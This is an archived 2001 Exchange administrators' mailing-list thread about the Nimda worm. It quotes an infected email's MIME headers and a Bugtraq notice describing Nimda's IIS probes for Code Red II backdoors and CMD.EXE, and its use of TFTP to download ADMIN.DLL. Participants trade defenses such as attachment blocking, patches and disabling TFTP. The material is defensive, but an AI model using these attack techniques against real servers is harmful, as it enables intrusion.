RE: New Virus / Worm ??
Sigh. Carine, I've sent you the link to Trend's try and buy version of scanmail at least twice. Even if you can't remember me, I remember you. Please go get the software right now so you can quit having these problems. Next week, buy it. http://www.antivirus.com/download/ -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 4:51 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? You can't. You need a product like TrendMicro's eManager. There are some others too. At 04:11 PM 9/20/01 +0800, you wrote: where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( Thank you Carine Improve your customers' satisfaction at a lower cost. Click here for details :- http://www.scs.com.my/scsNews.asp?article=30 _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
That is EXACTLY what I did when ILOVEYOU struck. We had Network Associates and it was coming through. DL'd and installed Scanmail on the spot. NEVER looked back -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Hunter, Lori Sent: Friday, September 21, 2001 2:41 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Sigh. Carine, I've sent you the link to Trend's try and buy version of scanmail at least twice. Even if you can't remember me, I remember you. Please go get the software right now so you can quit having these problems. Next week, buy it. http://www.antivirus.com/download/ -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 4:51 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? You can't. You need a product like TrendMicro's eManager. There are some others too. At 04:11 PM 9/20/01 +0800, you wrote: where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( Thank you Carine *** * Improve your customers' satisfaction at a lower cost. Click here for details :- http://www.scs.com.my/scsNews.asp?article=30 *** * _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Dear Everyone! This is the real thing and seems to be spreading fast, please configure your antivirus product running on the SMTP and the Exchange servers to block all attachments coming through with the extension .EXE or block the files coming through with the name README.EXE. Using eManager for InterScan you can block using Anti-Spam filter, to block all README.EXE or *.EXE. Richard Ku -Original Message- From: William Smith [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? It's a new/variant worm, possibly related to this: http://www.zdnet.com/eweek/stories/general/0,11011,2810273,00.html W -Original Message- From: Andrew Chan [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:41 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? It's time to activate those Content Filter features, AGAIN... :-) Andrew, MCSE (NT W2K) + CCNA -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 8:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco 0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0 404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 1:58 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Importance: High Dear Everyone! This is the real thing and seems to be spreading fast, please configure your antivirus product running on the SMTP and the Exchange servers to block all attachments coming through with the extension .EXE or block the files coming through with the name README.EXE. Using eManager for InterScan you can block using Anti-Spam filter, to block all README.EXE or *.EXE. Richard Ku -Original Message- From: William Smith [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? It's a new/variant worm, possibly related to this: http://www.zdnet.com/eweek/stories/general/0,11011,2810273,00.html W -Original Message- From: Andrew Chan [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:41 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? It's time to activate those Content Filter features, AGAIN... :-) Andrew, MCSE (NT W2K) + CCNA -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 8:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco 0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0 404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( Thank you Carine Improve your customers' satisfaction at a lower cost. Click here for details :- http://www.scs.com.my/scsNews.asp?article=30 _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
You can't. You need a product like TrendMicro's eManager. There are some others too. At 04:11 PM 9/20/01 +0800, you wrote: where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( Thank you Carine Improve your customers' satisfaction at a lower cost. Click here for details :- http://www.scs.com.my/scsNews.asp?article=30 _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Affected emails have an attached file called README.EXE. The virus attempts to exploit a MIME Vulnerability in some versions of Microsoft Outlook, Microsoft Outlook Express, and Internet Explorer to allow the executable file to run automatically without the user double-clicking on the attachment. Some versions of Microsoft Outlook, Outlook Express and Internet Explorer. Isn't that a little vague? Anybody got any more precise information about which versions of Outlook, OE and IE are affected? Is this virus self-running (like Bubbleboy running out of the preview pane) or do you need to run readme.exe to actually activate it? _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Really?? We're blocking .exe's just fine using Scanmail (scratching head). Does that mean we are special? Ben Winzenz, MCSE Network/Systems Administrator Peregrine Systems, Inc. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 5:51 AM To: Exchange Discussions Subject:RE: New Virus / Worm ?? You can't. You need a product like TrendMicro's eManager. There are some others too. At 04:11 PM 9/20/01 +0800, you wrote: where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( Thank you Carine Improve your customers' satisfaction at a lower cost. Click here for details :- http://www.scs.com.my/scsNews.asp?article=30 _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
You're special enough to know that you can't do it with just Exchange out of
the box.
8-{)
Joel K. Osborn
Information Systems Technical Specialist
Wisconsin Department of Transportation
[EMAIL PROTECTED]
-Original Message-
From: Benjamin Winzenz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 7:20 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??
Really?? We're blocking .exe's just fine using Scanmail (scratching head).
Does that mean we are special?
Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 5:51 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??
You can't. You need a product like TrendMicro's eManager. There are some
others too.
At 04:11 PM 9/20/01 +0800, you wrote:
where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(
Thank you
Carine
Improve your customers' satisfaction at a lower cost.
Click here for details :-
http://www.scs.com.my/scsNews.asp?article=30
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
LOL! Yeah, but I was also replying to the post that suggested you need
eManager to block attachments. Most Exchange AV packages will do it just
fine. Additional software like eManager I don't think is necessary. Last
time I checked, eManager was for content blocking as well.
Carine was also kind of vague as to whether she thought it was a function of
Exchange, or just didn't know where to configure it in here AV software.
Hopefully by now she realizes that she at least needs some AV software in
order to have attachment blocking.
Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.
-Original Message-
From: Osborn, Joel [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 9:21 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??
You're special enough to know that you can't do it with just Exchange out of
the box.
8-{)
Joel K. Osborn
Information Systems Technical Specialist
Wisconsin Department of Transportation
[EMAIL PROTECTED]
-Original Message-
From: Benjamin Winzenz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 7:20 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??
Really?? We're blocking .exe's just fine using Scanmail (scratching head).
Does that mean we are special?
Ben Winzenz, MCSE
Network/Systems Administrator
Peregrine Systems, Inc.
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 5:51 AM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??
You can't. You need a product like TrendMicro's eManager. There are some
others too.
At 04:11 PM 9/20/01 +0800, you wrote:
where to configure at the Exchange servers??? I could not find any
options to block it... huh!!! ;-(
Thank you
Carine
Improve your customers' satisfaction at a lower cost.
Click here for details :-
http://www.scs.com.my/scsNews.asp?article=30
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
_
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
I think they were talking about adding disclaimers and such -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Benjamin Winzenz Sent: September 20, 2001 8:20 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Really?? We're blocking .exe's just fine using Scanmail (scratching head). Does that mean we are special? Ben Winzenz, MCSE Network/Systems Administrator Peregrine Systems, Inc. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 5:51 AM To: Exchange Discussions Subject:RE: New Virus / Worm ?? You can't. You need a product like TrendMicro's eManager. There are some others too. At 04:11 PM 9/20/01 +0800, you wrote: where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( Thank you Carine Improve your customers' satisfaction at a lower cost. Click here for details :- http://www.scs.com.my/scsNews.asp?article=30 _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Just got off a Seminar with Cisco and they revealed this Web page that explains how to stop Nimda and Code REd at the router. Here is the Link. http://www.cisco.com/warp/public/63/nimda.shtml -Tony -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 1:32 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? You are right about ScanMail doing the attachment blocking. I have scanmail and emanager running. ScanMail is doing my attachment blocking and emanager is doing my content blocking. At 05:19 AM 9/20/01 -0700, you wrote: Really?? We're blocking .exe's just fine using Scanmail (scratching head). Does that mean we are special? Ben Winzenz, MCSE Network/Systems Administrator Peregrine Systems, Inc. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 5:51 AM To: Exchange Discussions Subject:RE: New Virus / Worm ?? You can't. You need a product like TrendMicro's eManager. There are some others too. At 04:11 PM 9/20/01 +0800, you wrote: where to configure at the Exchange servers??? I could not find any options to block it... huh!!! ;-( Thank you Carine Improve your customers' satisfaction at a lower cost. Click here for details :- http://www.scs.com.my/scsNews.asp?article=30 _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
The important thing is that there is a patch for IE 5 and 5.5. IE 6.0 shouldn't need a patch since this issue was identified quite a while back. The Media Player launch is annoying but relatively harmless, since Media Player apparently can't launch an .exe file. Are you getting the prompt to save the file? If not, check your IE security and see what the iFrame setting is What I find interesting is that I'm running IE 6.0 on Win2K Pro and I can't get figure out what IE setting is causing it to trigger the Media Player launch. I've turned sounds back on and still don't get Media Player. The bulletin only relates to IE 5 and 5.5 and has been superceded. Following the trail of bulletins out to the end, they still say they only apply to IE 5 and 5.5. I'm running IE 6.0 and still had Media Player launch because of the Mime code. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:57 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? It exploits the very dangerous iFrame vulnerability detailed at http://www.microsoft.com/technet/security/bulletin/ms01-020.asp. The one thing that article doesn't tell you is that the IE patch it describes does not block the ability of Office documents in an iFrame to launch automatically. What that means is that if you don't have Office macro security set high enough, the next attack could use a Word .doc macro to deliver its payload. I just received an e-mail with this virus/worm. It appears to be not very nice. I use the preview pane in Outlook and it automatically attempted to launch the attachment. For once, I'm glad I had the new security features in Outlook SR-1 that does not allow launching an .exe w/out saving it to the hard drive first. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Sounds like what I just now got notice of from Bugtraq -BEGIN PGP SIGNED MESSAGE- There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These infected machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS. It appears that the attacks can come both from email and from the network. A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of audio/x-wav together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.) The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities. One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box. Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP. Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following; edit %systemroot/system32/drivers/etc/services. change the line; tftp 69/udp to; tftp 0/udp thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed. More information as it arises. Cheers, Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor -BEGIN PGP SIGNATURE- Version: PGP Personal Privacy 6.5.2 iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6 iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO hSW7yN2lhJc= =YAwc -END PGP SIGNATURE- Delivery co-sponsored by Trend Micro, Inc. TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE If you are worried about email viruses, you need Trend Micro ScanMail for Exchange. ScanMail is the first antivirus solution that seamlessly integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail ensures 100% inbound and outbound email virus scanning and provides remote software management. Download a FREE 30-day trial copy of ScanMail and find out why it is the best: http://www.antivirus.com/banners/tracking.asp?si=8BI;=240UL;=/smex2000 -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe:
RE: New Virus / Worm ??
I received the same thing. I thought it may have been W32/APost@MM, because my alert said GSE blocked readme.exe. Nothing in the description for this virus says anything about media player. Any thoughts? Diane Diane Boehm SC Johnson [EMAIL PROTECTED] -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 10:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Symantec has something now, not much: http:[EMAIL PROTECTED] -Original Message- From: Atkinson, Daniel [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 8:41 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? yes, there is a new virus on the loose w32/nimda - we have just got it, comes in the same way as w32/apost-mm using 'readme.exe'. only sophos seem to know about it - symanted and mcaffee have nothing. our web servers are now under DoS attack, filling up with .eml files arrggghh... dan. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
